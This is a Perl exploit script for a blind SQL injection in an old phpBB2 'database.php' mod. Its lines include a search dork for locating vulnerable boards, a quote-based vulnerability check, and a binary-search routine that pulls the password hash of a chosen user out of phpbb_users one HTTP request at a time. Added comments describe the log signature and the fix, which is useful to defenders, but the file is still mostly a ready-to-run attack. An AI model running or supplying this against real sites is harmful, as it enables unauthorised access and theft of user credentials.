  1. #!/usr/bin/perl
  2. use strict;
  3. use warnings;
  4.  
  5. use LWP::UserAgent;
  6. #
  7. # phpBB2 database.php mod Remote (blind) SQL-Injection
  8. # Note: it is a very old mod, so I could not figure out the
  9. # name of the mod; even the phpbb.de administrator could
  10. # not tell me the name of the mod, though they had the
  11. # script on their server!
  12. #
  13. # Dork: database.php?dir_id
  14. #
  15.  
  16.  
  17.  
my $url = shift;
my $id = shift || usage();
# Candidate characters for every hash position: the 16 hex digits.
my $keyspace = "0123456789abcdef";

# global vars... nasty eh ?
# @url holds the three pieces that request() concatenates around the SQL
# comparator and the probe value; only the first piece is ever set here.
# $id comes straight from the command line and is interpolated unescaped.
# Note the sigil: the array @url is a different variable from the scalar $url.
our @url = ( "$url/database.php?dir_id=7+OR+ASCII(SUBSTR((SELECT+user_password+FROM+phpbb_users+WHERE+user_id=$id),1,1))", '', '' );
# Boolean oracle used by request(): a response body mentioning this filename
# is read as a "true" answer.
our $regex = 'functions_database\.php';
our $ua = LWP::UserAgent->new;


$ua->agent('mozilla.. :D');
print "[~] Checking...\n";
# Vulnerability probe: a bare quote in dir_id.  The German phpBB error banner
# "Allgemeiner Fehler" in the body is taken as confirmation, so this check is
# tied to German-language installs and says nothing about other locales.
my $r = $ua->get($url . "/database.php?dir_id='");
die "\t[!!] Couldnt connect to $url!\n" unless ( $r->is_success );
die "\t[!!] Target doesnt seem to be vulnerable!\n" unless ( $r->content =~ /Allgemeiner\ Fehler/ );

print "\t[*] Target seems to be vulnerable\n";


print "[~] Unleashing Black Magic...\n";
print STDERR "\t[*] Getting Hash: ";

# One pass per hash character: the numeric SUBSTR offset inside $url[0]
# (the "),1," part) is rewritten in place for positions 1..32 -- 32 hex
# characters, presumably an MD5 digest (not stated on the page) -- and
# blind() then searches the sorted hex code points for that position.
# blind()'s return value is discarded; the recovered characters are written
# to STDERR from inside blind().
# Detection note: in web-server logs this shows up as one request with
# dir_id=' followed by a burst of requests whose dir_id differs only in the
# SUBSTR offset and the comparator (= / <).  The server-side fix is to
# validate dir_id as an integer and use parameterised queries in the mod.
for ( 1..32 ) {
$url[0] =~ s/\),[0-9]{1,2},/\),$_,/;
blind( build_array($keyspace), 0, 16);
}
print "\n";
  45.  
  46.  
  47.  
  48.  
  49. sub usage {
  50. print q
  51. {-----------------------------------------
  52. - phpBB 'database.php mod' -
  53. - remote SQL-Injection -
  54. -----------------------------------------
  55. - written by electron1x -
  56. - bug discovered by j0hn.x3r -
  57. -----------------------------------------
  58. - Usage -
  59. - phpdb.pl <board> <user id> -
  60. - Sample -
  61. - phpdb.pl http://example.com/phbBB2/ 1 -
  62. -----------------------------------------
  63. - Dork -
  64. - inurl:database.php?dir_id -
  65. -----------------------------------------
  66. };
  67. exit(0);
  68. }
  69.  
  70.  
  71.  
sub blind
{
# Binary search over a sorted list of code points ($keyspace is the array
# reference produced by build_array()) between indices $bottom and $top.
# Each step asks the oracle request() whether the character at the current
# SUBSTR offset equals, or is less than, the candidate; every comparison is
# one HTTP request.  Returns the index of the matching code point, or exits
# the whole program when the interval is exhausted without a match.
my ( $keyspace, $bottom, $top ) = @_;
# int() binds only to ($bottom+$top); the /2 can leave a .5, which Perl
# truncates when the value is used as an array subscript below.
my $center = int ($bottom+$top)/2;
# Echo the candidate; it is rubbed out with "\b" if the oracle rejects it.
print STDERR chr $$keyspace[$center];
if ( request($$keyspace[$center], '=')) {
return $center;
} elsif ( $top-$bottom > 0) {
print STDERR "\b";
# Not less than the candidate -> recurse into the upper half, else the lower.
return blind($keyspace, $center+1, $top )
unless ( request($$keyspace[$center], '<') );
return blind($keyspace, $bottom, $center-1);
} else {
# Interval collapsed with no '=' hit: the oracle answers were inconsistent
# (for example a transport error, see request()), so give up.
print STDERR "[!!] Something went wront, dunno what..\n";
exit(1);
}
}
  89.  
  90. sub build_array {
  91. my @sorted = sort {$a<=>$b} map {ord} $_[0] =~ /./g;
  92. return \@sorted;
  93. }
  94.  
  95.  
sub request {
# Boolean oracle: one GET per call.  $key is a code point (a number) and
# $flag the SQL comparator ('=' or '<').  The URL is
# $url[0] . $flag . $url[1] . $key . $url[2]; with $url[1] and $url[2] empty
# (see the file-scope @url) that is $url[0] followed by the comparator and
# the number.  Returns true when the response body matches the file-scope
# $regex.  $r->is_success is not checked here, so a transport error or an
# error page is reported as "no match", which is what makes blind() bail.
my ( $key, $flag ) = @_;
my $r = $ua->get($url[0] . $flag . $url[1] . $key . $url[2]);
return ( $r->content =~ /$regex/ );
}
  101.  
  102. __END__